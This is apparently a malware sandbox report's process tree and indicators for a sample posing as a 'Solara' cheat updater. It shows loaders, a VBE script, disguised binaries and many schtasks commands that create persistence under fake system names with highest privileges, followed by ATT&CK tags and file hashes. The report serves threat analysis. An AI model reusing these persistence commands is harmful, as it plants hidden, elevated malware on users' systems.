-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"52⤵PID:2884
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"52⤵PID:380
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"53⤵PID:2448
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "54⤵
- Loads dropped DLL
PID:2648 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"55⤵PID:2380
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"52⤵PID:780
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"53⤵PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"53⤵PID:2980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"54⤵PID:1308
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "55⤵
- Loads dropped DLL
PID:2444 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"56⤵PID:2800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"53⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"54⤵PID:2304
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"54⤵PID:2836
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"55⤵PID:2488
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "56⤵
- Loads dropped DLL
PID:2456 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"57⤵PID:2856
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"54⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"55⤵PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"55⤵PID:1216
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"56⤵PID:2568
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "57⤵
- Loads dropped DLL
PID:792 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"58⤵PID:1284
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"55⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"56⤵PID:836
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"56⤵PID:1552
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"57⤵PID:296
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "58⤵
- Loads dropped DLL
PID:1876 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"59⤵PID:2060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"56⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"57⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"58⤵PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"58⤵PID:3016
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"57⤵PID:2084
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"58⤵PID:2592
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "59⤵
- Loads dropped DLL
PID:2816 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"60⤵PID:1728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"57⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"58⤵PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"58⤵PID:2228
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"59⤵PID:2960
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "60⤵
- Loads dropped DLL
PID:1960 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"61⤵PID:292
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"58⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"59⤵PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"59⤵PID:1512
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"60⤵PID:2700
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "61⤵PID:2124
-
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"62⤵PID:2084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"59⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"60⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"61⤵PID:880
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"61⤵PID:2336
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"60⤵PID:1960
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"61⤵PID:2724
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"60⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"61⤵PID:1228
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"61⤵PID:2828
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"62⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"61⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"62⤵PID:568
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"63⤵PID:1220
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"63⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"62⤵PID:920
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"63⤵PID:3052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"62⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"63⤵PID:524
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"63⤵PID:3020
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"64⤵PID:1344
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"63⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"64⤵PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"64⤵PID:2172
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"65⤵PID:2584
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"64⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"65⤵PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"65⤵PID:2624
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"66⤵PID:2740
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"65⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"66⤵PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"66⤵PID:1844
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"67⤵PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"66⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"67⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"67⤵PID:2532
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"68⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"67⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"68⤵PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"68⤵PID:2964
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"69⤵PID:1308
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"68⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"69⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"69⤵PID:2100
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"70⤵PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"69⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"70⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"70⤵PID:2732
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"71⤵PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"70⤵PID:2284
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD184026-3B1F-4DEE-8D23-332027688C9C} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵PID:2552
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵
- Executes dropped EXE
PID:1296
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2852
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:300
-
-
C:\hostNet\smss.exe"C:\hostNet\smss.exe"3⤵PID:2308
-
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2772
-
C:\hostNet\smss.exe"C:\hostNet\smss.exe"3⤵PID:320
-
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:2068
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\hostNet\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\hostNet\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\hostNet\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1532
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\taskeng.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 5 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1072
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD58ccc428a5a6f6139dc191d332f3de08b
SHA1ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA5121479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
139KB
MD58f77f8b13b914f358059e3f7b9ddab70
SHA1d406a28486b4dd881c454e526e149b98c0ec8462
SHA256c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad
-
Filesize
231KB
MD5ff8f5c2670894f74456e534b34d6a8fe
SHA1e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff
-
Filesize
60KB
MD528ff989c1d462f567aabb9c5ba76456b
SHA124be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA5122e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba
-
Filesize
350KB
MD522c510c68f47d2d392b168fd63a8ee22
SHA1a556c157badbc67db2560d7fa0e86472434632c2
SHA2562723a2a1610f33c82abb9d2ae1335567a7dfc4e23f8247f0f8205086fd3044e7
SHA51276a89f006c4e8a4daa916b5012ced7a848e28ed01f3ea5a8d89ce2f0923c4c233b37689eebf35230d82fb21d78a1b2c4245354f30f85902dad302803ff3d466a
-
Filesize
2.1MB
MD525daefc71be60b76cb49fc81424d768d
SHA148be475dd36b433d62d4f7fed9b4d81a90122dee
SHA2561b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a6a385d15c71f85e4bb2d0f575eb21f0
SHA1d1ba8b3701bac5ef5285382b4cafa52d92e0779c
SHA256112ddf676b86e3b98806c99ac573cb16ed0d0e88d3e6b85f9d982a7e876abfd6
SHA512469340f51565a61eaa5e2427ebe74b633fab328501f7c1dec47b88737339f3443f75d501bcfdb92d2759b6ba752b363025fdcba0154833ecb792545f2daea1be
-
Filesize
2KB
MD5577f27e6d74bd8c5b7b0371f2b1e991c
SHA1b334ccfe13792f82b698960cceaee2e690b85528
SHA2560ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c
-
Filesize
230B
MD592408a105526970fa12ef23225de61ae
SHA1bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA51256df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043